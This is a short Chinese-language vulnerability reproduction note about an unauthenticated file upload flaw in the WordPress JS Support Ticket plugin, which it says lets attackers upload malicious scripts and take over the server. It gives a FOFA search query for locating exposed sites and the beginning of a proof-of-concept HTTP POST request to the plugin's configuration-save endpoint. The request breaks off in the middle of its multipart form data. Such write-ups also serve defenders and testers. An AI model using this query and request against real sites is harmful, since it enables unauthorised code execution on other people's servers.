0x01 产品简介

WordPress和WordPress plugin都是WordPress基金会的产品。JS Support Ticket是使用在其中的一套开源票务系统插件。

0x02 漏洞概述

WordPress中的JS Support Ticket插件存在未经上传漏洞，未经身份验证的攻击者可以上传恶意脚本的服务器，执行任意指令，从而获取服务器权限。

0x03 复现环境

FOFA：body="wp-content/plugins/js-support-ticket"

0x04 漏洞复现

PoC

POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host: your-ip
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: multipart/form-data; boundary=b983c629ca9b1450283a9b8d1b953898--b983c629ca9b1450283a9b8d1b953898
Content-Disposition: form-data; name="support